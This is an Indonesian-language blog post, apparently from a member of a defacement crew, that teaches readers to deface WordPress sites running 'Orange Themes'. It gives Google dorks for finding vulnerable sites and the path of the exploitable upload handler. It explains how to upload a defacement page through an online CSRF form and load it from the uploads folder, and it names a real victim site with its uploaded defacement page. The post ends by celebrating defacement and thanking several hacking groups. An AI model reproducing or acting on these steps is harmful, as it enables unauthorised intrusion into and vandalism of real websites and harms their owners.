Tutorial Deface Poc Wp Orange Themes
Mei 10, 2021
Tutorial Deface Poc Wp Orange Themes
Oleh Xskyz07
Assalamualaikum hallo gan balik lagi sama gua kali ini gua bakal kasih tutorial deface poc wp orange themes ini poc cukup lama tapi masih ada web yg vuln :v
Oke untuk bahan bahan nya
-Hp/Pc
-Dork
-Exploit
-Sc Deface
Dork:
inurl:/wp-content/themes/kernel-theme
inurl:/wp-content/themes/bordeaux-theme
inurl:/wp-content/themes/bulteno-theme
inurl:/wp-content/themes/rayoflight-theme
Kembangin Lagi
Exploit:
wp-content/themes/rockstar-theme/functions/upload-handler.php
Karna gua ada live target jadi kaga usah ngedork lagi
Live Target Klik Disini
Pertama kasih exploit nya di belakang site yaaa....
Nah kalo tampilan nya kek gini tandanya web nya vuln langsung aja salin lalu ke csrf online
Tempel di url target untuk post file orange_themes kalo udh klik target key dan upload sc deface kalian
Kalo keluar nama sc yg kalian upload itu tanda berhasil ke upload tinggal panggil aja sc nya
Caranya?
www.site.com/wp-content/uploads/tahun/bulan/sclu.html
Oke disini gua perjelas make punya gua
https://www.123rock.net/wp-content/uploads/2021/03/az.html
Nah itu dia
Oke Done!!!
Oke segitu aja tutor dari gw kali ini semoga bermanfaat sekian dan terimakasih
Thanks To:
-All Member Indonesia Cyber Nightmare
-Black Brotherhood
-SevenGhost666
-Eagle Xploiter
-Doraemon Cyber Team
#Happy Learn
#Happy Deface